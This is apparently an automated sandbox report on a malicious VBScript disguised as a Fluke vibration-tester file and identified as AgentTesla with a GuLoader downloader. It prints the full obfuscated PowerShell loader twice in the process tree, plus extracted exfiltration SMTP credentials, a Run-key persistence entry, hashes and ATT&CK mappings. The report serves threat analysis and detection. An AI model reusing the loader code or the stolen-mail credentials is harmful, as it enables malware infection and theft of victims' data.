agenttesla | 80d595f9e8002169ae694344137740dced889fd34b08f1b8ace34208957c7799

Analysis

max time kernel
145s
max time network
143s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-03-2024 10:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FLUKE 810 vibration Tester.vbs
Size

39KB
MD5

1bef7f8d8e8c56eb3c97145c73ca9349
SHA1

ebe18932bafb53f5625025d9a2d0425d1bd94b19
SHA256

80d595f9e8002169ae694344137740dced889fd34b08f1b8ace34208957c7799
SHA512

910aea33d6faadaeca883774dc4e360ec90cdddbce1859d4bbd86ba3f6c1e5a94094eb86fae5588d7be952066ec5580a32ce3376614b5172602c34b41688f41a
SSDEEP

384:u05gBZSUIWz0AujGKoCJmMuttrW6ku83V3aiHwhnXH/QSj+jhDzYUHyOKGrzTCq:u05gBZAWAZGc8NnKwiQhnkjhoUSOKkT

Score

10^/10

agenttesla guloader downloader keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.medicalhome.com.pe
Port:
587
Username:
[email protected]
Password:
MHinfo01
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

wab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\GrOcCQC = "C:\\Users\\Admin\\AppData\\Roaming\\GrOcCQC\\GrOcCQC.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
9 drive.google.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2532 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1100 powershell.exe
2532 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1100 set thread context of 2532 1100 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2244 powershell.exe
1100 powershell.exe
1100 powershell.exe
2532 wab.exe
2532 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1100 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2244 powershell.exe
Token: SeDebugPrivilege 1100 powershell.exe
Token: SeDebugPrivilege 2532 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

flow	ioc
15	ip-api.com

pid	process
2532	wab.exe

pid	process
1100	powershell.exe
2532	wab.exe

description	pid	process	target process
PID 1100 set thread context of 2532	1100	powershell.exe	wab.exe

pid	process
2244	powershell.exe
1100	powershell.exe
1100	powershell.exe
2532	wab.exe
2532	wab.exe

pid	process
1100	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	2532	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2020 wrote to memory of 2244	2020	WScript.exe	powershell.exe
PID 2020 wrote to memory of 2244	2020	WScript.exe	powershell.exe
PID 2020 wrote to memory of 2244	2020	WScript.exe	powershell.exe
PID 2244 wrote to memory of 2524	2244	powershell.exe	cmd.exe
PID 2244 wrote to memory of 2524	2244	powershell.exe	cmd.exe
PID 2244 wrote to memory of 2524	2244	powershell.exe	cmd.exe
PID 2244 wrote to memory of 1100	2244	powershell.exe	powershell.exe
PID 2244 wrote to memory of 1100	2244	powershell.exe	powershell.exe
PID 2244 wrote to memory of 1100	2244	powershell.exe	powershell.exe
PID 2244 wrote to memory of 1100	2244	powershell.exe	powershell.exe
PID 1100 wrote to memory of 308	1100	powershell.exe	cmd.exe
PID 1100 wrote to memory of 308	1100	powershell.exe	cmd.exe
PID 1100 wrote to memory of 308	1100	powershell.exe	cmd.exe
PID 1100 wrote to memory of 308	1100	powershell.exe	cmd.exe
PID 1100 wrote to memory of 2532	1100	powershell.exe	wab.exe
PID 1100 wrote to memory of 2532	1100	powershell.exe	wab.exe
PID 1100 wrote to memory of 2532	1100	powershell.exe	wab.exe
PID 1100 wrote to memory of 2532	1100	powershell.exe	wab.exe
PID 1100 wrote to memory of 2532	1100	powershell.exe	wab.exe
PID 1100 wrote to memory of 2532	1100	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FLUKE 810 vibration Tester.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoroughest Accident Sprogtalenternes Tangi Perseid Letpaakldt #>;$Aandedrtssystemerndesprringer=(cmd /c set /A 115^^0);Function Beklippedes ([String]$Langrages){$Divot=[char][int]$Aandedrtssystemerndesprringer+'ubstring';$Aforismers=8;$Watchwords=Hakeems($Langrages);For($Aandedrtssystemer=7; $Aandedrtssystemer -lt $Watchwords; $Aandedrtssystemer+=$Aforismers){$Matthean=$Langrages.$Divot.Invoke($Aandedrtssystemer, 1);$Tilbagelgge=$Tilbagelgge+$Matthean;}$Tilbagelgge;}function skyl ($Baadpladsen){& ($Nonindividuality) ($Baadpladsen);}function Hakeems ([String]$Duelbs){$Dyrefoder=$Duelbs.Length-1;$Dyrefoder;}$Plurilingualist=Beklippedes ' .ausatTregulerr Ramo saFjerbusnDetaches RecentfLevetideLejrudsrLdrikkerSmmeneaiSaccharnLandgangSskende ';$Specialformater=Beklippedes 'Unmimeohoffen.etGadeplatacornpyp UnbewisUdgangs: Mer.to/M lieri/Seksturd archdarTermil.i byb nevna skove Lept c.Presteag alstafo S,rteroVokalisgHillebrlsorbet eRelicti..lektrocH.rpiksoPolyvalm Onchid/Omredigu PancracUnde pr?.rgusbleHuntsmaxObsoletp,reechuoallergorPlumi.otTilbuds=GloatindStvko.so MisantwdelelejnUtilitalUlrikasoSparereapaphiopdUndersl&Reboisei AlbrundHngepar=.orthaa1SyddansV okumen4Ju.isdiWImper sMStumpruXGryntenvEnamel.7Scar mesKlatterpGaloppemWarlord8PicaediyuncountPMdeaktiSaugustbb MorfinTniaarigeEkstrem3 Receiv3 LgnereYRejselo8UpgleanQ Para.ieunderbotdarklysrAwmbriey UndervY raplo,SKrftsciqS.usedehMalarkeLDykkermMTerrito ';$Nonindividuality=Beklippedes 'Brus ini Perik.eForregnxContect ';$Bourr=Beklippedes 'juristi$SubexamgEgedesml .oldsvoHelsefyb Tilbuda TripodlTu.hery:.illidsJ Ato,aftNar,eintSprngnieDe.endesAnt cent ParacyucolineaeAlimentr thanatnCrinolieAntin t god.te=Penolog FaecaloSChurchwt,igwameasocialfr .lokdat Ban ai-Femr spBLavtlnsiRevo,utt,prdstesSerialiTlesbianrDiscontaSemielanDmonisas nicotifopisthoeBehaviorFo,lerp Lota,hy-RenvaskSSkru.ppoYariyaruUnigenirOpflamnc Garn,iew.orali Midte.g$Z,gankuSLucidaepKnuselseEksamincParalysiSydvestaOrkestel ,vanhifPerduraoNond gerBrnepenmN mograaSymbolit.tjforhe PiratirJ.rstsi Engang-LrerigeD OlecraeAdversesKbsvanetCallopmiBilletanVacciniaGoethittdestab.imoldb.aoBea.nainMysteri Gaveric$ BroileSDy.etmmpSupermalLutrendi Dissl tAkkredib Vittleo Longanl IsoenztRelatioeNdraabenTransvas I.oant ';skyl (Beklippedes ' Isfyld$ Phor mgOscillalHoardedochanc lb Duncifa St grelCaroign:NaturalSAn.ergapBesaarnlelatreniAnpartstinterlobTalkolooPlacebol esculitTrl.ense,attleln .rdiresOrdeals=M dular$genereneHan elsn Angivev Srken,:ComminaaU,kommapSydafripSeng,stdFattigfaTetraamtFebrilsaslavesj ') ;skyl (Beklippedes 'blawingIPhysostmConst,apSnefogkoGrimacer In laatResharp- MasseuMSweetheoInda indGrav jeu WhiggilGuldaldeSkel.tn SaturnB t noloiOmstbnitMexic ns Batod TBeskererEastlana.ivetonn ZonelosGe.nemgfA,ropoleTitrerirTale.rg ') ;$Splitboltens=$Splitboltens+'\computerbranche.Omv' ;skyl (Beklippedes 'Sparily$SllertegA,tinomlSam,temo,flbsbrb,aavirkaTvrsunilZombier:JejunumQ Afhri,u Gump,eeOxyg,nas TorturtLaglyrai Relegao RowablnTirenscaDo.beltbRoguerylRhiz.bieKanebjlnUndervie Ch,gassBar.lers dross,1 Bidra 7 hickif3F rvegl=Trepang(KnytninTFari gse.ymophysGtevieltbe.peak- UdforsPEp,xyhea Ast.ret L,nearhacyrolo Duefalk$,ahonabSHeadstrpKllingelDis.utiiGemari tmorsendbSek ndroUnlus.ilUdsynettstaffane A.rominExpectos Medund)Skydevi ') ;while (-not $Questionableness173) {skyl (Beklippedes 'RadiomoIVociferf Overpr Harriil(benha,r$ TikmpeJ.lammestUlanslitSiliu.weBoghandsSkee.sktaflvettuTopskude I,onisrSociallnTyl,steeKrydsmi.DeploriJPanichtoScabbedbComplemSRegneopt BulteraReliquetpyro hoeSquisst Danses.-Gge.ngee ossipeqFjervgt Synta s$KunstanPH.urderl ConjunuSnorb.rrRecitati IndekslStrutski AfskrinMu hopigFearf.lu Jath.saS miperlArti.uliTerminosPeptonetSeeppro) Radial Mtaal.l{PlankonSTraadlst DigterasocialirbookbintRade,na-TamasicSDameskrlriggeabeUnpulvie PernicpArmedep Studdi.1Reitera}VioletteFeram,rlCamelrysAutologe,eturna{Tilb,geS tupesktBorofluaRedningrForsikrtDamasce- PygmsfSFoullyflSenatfeeSelva te Int,rcpTairger Helfred1intertr;VekseldsvipstjrkPal.aluyAdo.abilInkorpo Bifagss$da dyisBRetinitoAc,tomeuSvigerbrA acrusrKer.toc}Project ');skyl (Beklippedes 'Sk fere$AnticengMagueyslTimb reoCairngobChaineraDenti olUncarri:dannebrQlbskesnuFremtrdeP.eservsC tholitF.renegiMilieubo AfpolinSubideaaFrlaarbb KrustalCho.isteUnderswn Web teeForekomsTrevlemsKd rned1Whipshi7Godle s3Nixonte=Plastis(HaremskTUglens.ePaabydesUnpinchtAchroma-ribbonwP Insecta Dr ermt ekomprhKon.orc ensite$ ,alcaeSSenil,sp GranchlprostatiOpretsttflaaterbCentraloTand,nol PiskertOutstrieOv.rdngnSectarys Yieldi)frlaare ') ;}skyl (Beklippedes ' Probos$.ransfogUnincorlSneugleo DescenbSynftigaTitularlGluonsa:Rese.veBBagdrudrNavnendoSovseneoHewelf dFrysetjiRepelleeF,rretnsMarskaltDroolie Beostre= Udvikl C risteG TruncaeInternet ormidd-DobbeltCLutternoAllowabn ScrapitadinarueInfor.anUnderr tJarvies Dise.t$ ScrobiSLe iterpRe.enstlNonlu.iiCrusaditSkibsvrbCelebreoNym.omalStuegantGeebunge Microcnb,naadnsBybo.rn ');skyl (Beklippedes 'Moderni$ Denti gVadehavl .abaleoTrebanebKulkassaZeuzerilShahdis:SabbataGBagladeu Over asHovertrtS.indle Saltkar=Vindemi Preterd[ eessreSOverinsyPansophsCatherntPjaskereIdop eamRestrin.GenforeCFilmopeo P.berbnHarianavDataalde Fo.talr Spignut unsubj]Typical: Elfhoo:HossproFUd,tyknrOldeforoBornmeumNo,irreBA,bassyaBisp.stsTakistoeTilslut6 ,ugser4 EncrinSAabenhjt featherAgyr.teiEtageb nFu ebrigCs.umsk(Kampdue$ ,evaliBSlyngplrSek.ndro Eleutcostadierd dgiftsiCyanobeeWain.ulskondenst H efte)Af agel ');skyl (Beklippedes 'Bitterw$BepiecegSlidderlGyneolaoPtery ib Chuckfa,iathesl Isolat:LaryngeGSikkersrdri,hjuaAna ondnInter edUnc nspiDentartoUdpunktsFemtepltBopyrid Miner.a= Kvad,a Yamanai[ PhotodSBravurnyUdsttelsbdeudmat Stemmee Anlgs mToursol.NormaliTExplan,eIn.trukx,opulratMarinbi.Solv rmEPap.gayndiswenccDyscraso Kamferd TypiskiStofndsnNonsyntgHe fald]Dec rsi:Unstudi:HyalobaAhumidisS.eucemiCCirkataIDecompoIVertica.Domest GUnderade AutothtTrochodSStoppertUnillusrDue baeiAchesounPhotoglg kerneb(Kontrol$DiscrepGSecr.tauunderetsMethodotPrefree)disgall ');skyl (Beklippedes 'Seksogt$Finh,algRatihabl.raculaoBoxberrbUnderspaMedsk,ll Arbejd:geotropF .pisekoInformarGtenomlb Polychr Sp rtsuTilpropg Jublene WaversrLapicidvCenterveIndbildn emaerlskamliniRentabigIntend = Hfligh$ OverdvGElektror Smagssa RecharnPoliom d s.ifteiIfrelseoatefs rsStyk.istFelsm s.NormaltsIntrapeu KlummebDokumensTurnshet PhytohrA.rsindi Carislnr,discugstrikse(karakte3.oleles3,kideng4Brumsto9 Tapisf3Randsye6Aysesne,Antogco3T lescr1Outg.ar3Ostet i6bim,isa9 Famili)fechner ');skyl $Forbrugervenlig;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2244
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c set /A 115^^0
    3⤵
    PID:2524
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoroughest Accident Sprogtalenternes Tangi Perseid Letpaakldt #>;$Aandedrtssystemerndesprringer=(cmd /c set /A 115^^0);Function Beklippedes ([String]$Langrages){$Divot=[char][int]$Aandedrtssystemerndesprringer+'ubstring';$Aforismers=8;$Watchwords=Hakeems($Langrages);For($Aandedrtssystemer=7; $Aandedrtssystemer -lt $Watchwords; $Aandedrtssystemer+=$Aforismers){$Matthean=$Langrages.$Divot.Invoke($Aandedrtssystemer, 1);$Tilbagelgge=$Tilbagelgge+$Matthean;}$Tilbagelgge;}function skyl ($Baadpladsen){& ($Nonindividuality) ($Baadpladsen);}function Hakeems ([String]$Duelbs){$Dyrefoder=$Duelbs.Length-1;$Dyrefoder;}$Plurilingualist=Beklippedes ' .ausatTregulerr Ramo saFjerbusnDetaches RecentfLevetideLejrudsrLdrikkerSmmeneaiSaccharnLandgangSskende ';$Specialformater=Beklippedes 'Unmimeohoffen.etGadeplatacornpyp UnbewisUdgangs: Mer.to/M lieri/Seksturd archdarTermil.i byb nevna skove Lept c.Presteag alstafo S,rteroVokalisgHillebrlsorbet eRelicti..lektrocH.rpiksoPolyvalm Onchid/Omredigu PancracUnde pr?.rgusbleHuntsmaxObsoletp,reechuoallergorPlumi.otTilbuds=GloatindStvko.so MisantwdelelejnUtilitalUlrikasoSparereapaphiopdUndersl&Reboisei AlbrundHngepar=.orthaa1SyddansV okumen4Ju.isdiWImper sMStumpruXGryntenvEnamel.7Scar mesKlatterpGaloppemWarlord8PicaediyuncountPMdeaktiSaugustbb MorfinTniaarigeEkstrem3 Receiv3 LgnereYRejselo8UpgleanQ Para.ieunderbotdarklysrAwmbriey UndervY raplo,SKrftsciqS.usedehMalarkeLDykkermMTerrito ';$Nonindividuality=Beklippedes 'Brus ini Perik.eForregnxContect ';$Bourr=Beklippedes 'juristi$SubexamgEgedesml .oldsvoHelsefyb Tilbuda TripodlTu.hery:.illidsJ Ato,aftNar,eintSprngnieDe.endesAnt cent ParacyucolineaeAlimentr thanatnCrinolieAntin t god.te=Penolog FaecaloSChurchwt,igwameasocialfr .lokdat Ban ai-Femr spBLavtlnsiRevo,utt,prdstesSerialiTlesbianrDiscontaSemielanDmonisas nicotifopisthoeBehaviorFo,lerp Lota,hy-RenvaskSSkru.ppoYariyaruUnigenirOpflamnc Garn,iew.orali Midte.g$Z,gankuSLucidaepKnuselseEksamincParalysiSydvestaOrkestel ,vanhifPerduraoNond gerBrnepenmN mograaSymbolit.tjforhe PiratirJ.rstsi Engang-LrerigeD OlecraeAdversesKbsvanetCallopmiBilletanVacciniaGoethittdestab.imoldb.aoBea.nainMysteri Gaveric$ BroileSDy.etmmpSupermalLutrendi Dissl tAkkredib Vittleo Longanl IsoenztRelatioeNdraabenTransvas I.oant ';skyl (Beklippedes ' Isfyld$ Phor mgOscillalHoardedochanc lb Duncifa St grelCaroign:NaturalSAn.ergapBesaarnlelatreniAnpartstinterlobTalkolooPlacebol esculitTrl.ense,attleln .rdiresOrdeals=M dular$genereneHan elsn Angivev Srken,:ComminaaU,kommapSydafripSeng,stdFattigfaTetraamtFebrilsaslavesj ') ;skyl (Beklippedes 'blawingIPhysostmConst,apSnefogkoGrimacer In laatResharp- MasseuMSweetheoInda indGrav jeu WhiggilGuldaldeSkel.tn SaturnB t noloiOmstbnitMexic ns Batod TBeskererEastlana.ivetonn ZonelosGe.nemgfA,ropoleTitrerirTale.rg ') ;$Splitboltens=$Splitboltens+'\computerbranche.Omv' ;skyl (Beklippedes 'Sparily$SllertegA,tinomlSam,temo,flbsbrb,aavirkaTvrsunilZombier:JejunumQ Afhri,u Gump,eeOxyg,nas TorturtLaglyrai Relegao RowablnTirenscaDo.beltbRoguerylRhiz.bieKanebjlnUndervie Ch,gassBar.lers dross,1 Bidra 7 hickif3F rvegl=Trepang(KnytninTFari gse.ymophysGtevieltbe.peak- UdforsPEp,xyhea Ast.ret L,nearhacyrolo Duefalk$,ahonabSHeadstrpKllingelDis.utiiGemari tmorsendbSek ndroUnlus.ilUdsynettstaffane A.rominExpectos Medund)Skydevi ') ;while (-not $Questionableness173) {skyl (Beklippedes 'RadiomoIVociferf Overpr Harriil(benha,r$ TikmpeJ.lammestUlanslitSiliu.weBoghandsSkee.sktaflvettuTopskude I,onisrSociallnTyl,steeKrydsmi.DeploriJPanichtoScabbedbComplemSRegneopt BulteraReliquetpyro hoeSquisst Danses.-Gge.ngee ossipeqFjervgt Synta s$KunstanPH.urderl ConjunuSnorb.rrRecitati IndekslStrutski AfskrinMu hopigFearf.lu Jath.saS miperlArti.uliTerminosPeptonetSeeppro) Radial Mtaal.l{PlankonSTraadlst DigterasocialirbookbintRade,na-TamasicSDameskrlriggeabeUnpulvie PernicpArmedep Studdi.1Reitera}VioletteFeram,rlCamelrysAutologe,eturna{Tilb,geS tupesktBorofluaRedningrForsikrtDamasce- PygmsfSFoullyflSenatfeeSelva te Int,rcpTairger Helfred1intertr;VekseldsvipstjrkPal.aluyAdo.abilInkorpo Bifagss$da dyisBRetinitoAc,tomeuSvigerbrA acrusrKer.toc}Project ');skyl (Beklippedes 'Sk fere$AnticengMagueyslTimb reoCairngobChaineraDenti olUncarri:dannebrQlbskesnuFremtrdeP.eservsC tholitF.renegiMilieubo AfpolinSubideaaFrlaarbb KrustalCho.isteUnderswn Web teeForekomsTrevlemsKd rned1Whipshi7Godle s3Nixonte=Plastis(HaremskTUglens.ePaabydesUnpinchtAchroma-ribbonwP Insecta Dr ermt ekomprhKon.orc ensite$ ,alcaeSSenil,sp GranchlprostatiOpretsttflaaterbCentraloTand,nol PiskertOutstrieOv.rdngnSectarys Yieldi)frlaare ') ;}skyl (Beklippedes ' Probos$.ransfogUnincorlSneugleo DescenbSynftigaTitularlGluonsa:Rese.veBBagdrudrNavnendoSovseneoHewelf dFrysetjiRepelleeF,rretnsMarskaltDroolie Beostre= Udvikl C risteG TruncaeInternet ormidd-DobbeltCLutternoAllowabn ScrapitadinarueInfor.anUnderr tJarvies Dise.t$ ScrobiSLe iterpRe.enstlNonlu.iiCrusaditSkibsvrbCelebreoNym.omalStuegantGeebunge Microcnb,naadnsBybo.rn ');skyl (Beklippedes 'Moderni$ Denti gVadehavl .abaleoTrebanebKulkassaZeuzerilShahdis:SabbataGBagladeu Over asHovertrtS.indle Saltkar=Vindemi Preterd[ eessreSOverinsyPansophsCatherntPjaskereIdop eamRestrin.GenforeCFilmopeo P.berbnHarianavDataalde Fo.talr Spignut unsubj]Typical: Elfhoo:HossproFUd,tyknrOldeforoBornmeumNo,irreBA,bassyaBisp.stsTakistoeTilslut6 ,ugser4 EncrinSAabenhjt featherAgyr.teiEtageb nFu ebrigCs.umsk(Kampdue$ ,evaliBSlyngplrSek.ndro Eleutcostadierd dgiftsiCyanobeeWain.ulskondenst H efte)Af agel ');skyl (Beklippedes 'Bitterw$BepiecegSlidderlGyneolaoPtery ib Chuckfa,iathesl Isolat:LaryngeGSikkersrdri,hjuaAna ondnInter edUnc nspiDentartoUdpunktsFemtepltBopyrid Miner.a= Kvad,a Yamanai[ PhotodSBravurnyUdsttelsbdeudmat Stemmee Anlgs mToursol.NormaliTExplan,eIn.trukx,opulratMarinbi.Solv rmEPap.gayndiswenccDyscraso Kamferd TypiskiStofndsnNonsyntgHe fald]Dec rsi:Unstudi:HyalobaAhumidisS.eucemiCCirkataIDecompoIVertica.Domest GUnderade AutothtTrochodSStoppertUnillusrDue baeiAchesounPhotoglg kerneb(Kontrol$DiscrepGSecr.tauunderetsMethodotPrefree)disgall ');skyl (Beklippedes 'Seksogt$Finh,algRatihabl.raculaoBoxberrbUnderspaMedsk,ll Arbejd:geotropF .pisekoInformarGtenomlb Polychr Sp rtsuTilpropg Jublene WaversrLapicidvCenterveIndbildn emaerlskamliniRentabigIntend = Hfligh$ OverdvGElektror Smagssa RecharnPoliom d s.ifteiIfrelseoatefs rsStyk.istFelsm s.NormaltsIntrapeu KlummebDokumensTurnshet PhytohrA.rsindi Carislnr,discugstrikse(karakte3.oleles3,kideng4Brumsto9 Tapisf3Randsye6Aysesne,Antogco3T lescr1Outg.ar3Ostet i6bim,isa9 Famili)fechner ');skyl $Forbrugervenlig;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1100
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c set /A 115^^0
      4⤵
      PID:308
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
16bea635f63eb46a84d469cbe1926cca

SHA1
815ef79aedc28be871e4436713ac7e0f11273f38

SHA256
c07aca1ba56323a0941ecc9fcf380ac4f16b78624bdc60e7e2462f049d1d89b2

SHA512
2f28270f4cc5fad3ee210460345094003ec62d28879f2c19e5597652178142bd32bdb7183ab74afff4667b9791853dafcd1318d1a5d59af146fef65fa38ac67a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA18D.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J3JEBJG35HQY0NA7P3JR.temp

Filesize
7KB

MD5
4c859daddcb98b54376909f30dd795a2

SHA1
2f6c2ea60e7b068d8e213ae3d10def61728b14f5

SHA256
c53fc6bfbd1f80d9804d648903d4333adb3b7c19dc6aa7b9b6779444ced55982

SHA512
b334388e1caa56d18096807d6861ae0d1ffaf11c5e578e4379e5c5c1a7a4570135d74920bd0feb1b89ef1b3046b268ac81a243aa85dd0234716a15b86f678f98

Download Submit
memory/1100-37-0x0000000077BC0000-0x0000000077D69000-memory.dmp

Filesize
1.7MB

Download
memory/1100-15-0x0000000073C00000-0x00000000741AB000-memory.dmp

Filesize
5.7MB

Download
memory/1100-40-0x0000000077DB0000-0x0000000077E86000-memory.dmp

Filesize
856KB

Download
memory/1100-39-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/1100-38-0x0000000073C00000-0x00000000741AB000-memory.dmp

Filesize
5.7MB

Download
memory/1100-36-0x0000000006A50000-0x0000000007D47000-memory.dmp

Filesize
19.0MB

Download
memory/1100-70-0x0000000006A50000-0x0000000007D47000-memory.dmp

Filesize
19.0MB

Download
memory/1100-44-0x0000000006A50000-0x0000000007D47000-memory.dmp

Filesize
19.0MB

Download
memory/1100-16-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/1100-17-0x0000000073C00000-0x00000000741AB000-memory.dmp

Filesize
5.7MB

Download
memory/1100-18-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/1100-28-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/1100-34-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/1100-30-0x0000000006A50000-0x0000000007D47000-memory.dmp

Filesize
19.0MB

Download
memory/2244-33-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2244-11-0x0000000002B70000-0x0000000002B92000-memory.dmp

Filesize
136KB

Download
memory/2244-29-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2244-4-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2244-32-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2244-31-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2244-12-0x0000000002A90000-0x0000000002AA2000-memory.dmp

Filesize
72KB

Download
memory/2244-7-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2244-10-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2244-9-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2244-73-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2244-5-0x0000000000550000-0x0000000000558000-memory.dmp

Filesize
32KB

Download
memory/2244-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2244-35-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2244-6-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2532-45-0x0000000077DB0000-0x0000000077E86000-memory.dmp

Filesize
856KB

Download
memory/2532-46-0x0000000077DE6000-0x0000000077DE7000-memory.dmp

Filesize
4KB

Download
memory/2532-67-0x0000000001040000-0x00000000020A2000-memory.dmp

Filesize
16.4MB

Download
memory/2532-42-0x0000000077BC0000-0x0000000077D69000-memory.dmp

Filesize
1.7MB

Download
memory/2532-71-0x0000000001040000-0x00000000010B6000-memory.dmp

Filesize
472KB

Download
memory/2532-41-0x00000000020B0000-0x00000000033A7000-memory.dmp

Filesize
19.0MB

Download
memory/2532-72-0x000000006F550000-0x000000006FC3E000-memory.dmp

Filesize
6.9MB

Download
memory/2532-74-0x000000001EBF0000-0x000000001EC30000-memory.dmp

Filesize
256KB

Download
memory/2532-77-0x00000000020B0000-0x00000000033A7000-memory.dmp

Filesize
19.0MB

Download
memory/2532-80-0x000000006F550000-0x000000006FC3E000-memory.dmp

Filesize
6.9MB

Download
memory/2532-81-0x000000001EBF0000-0x000000001EC30000-memory.dmp

Filesize
256KB

Download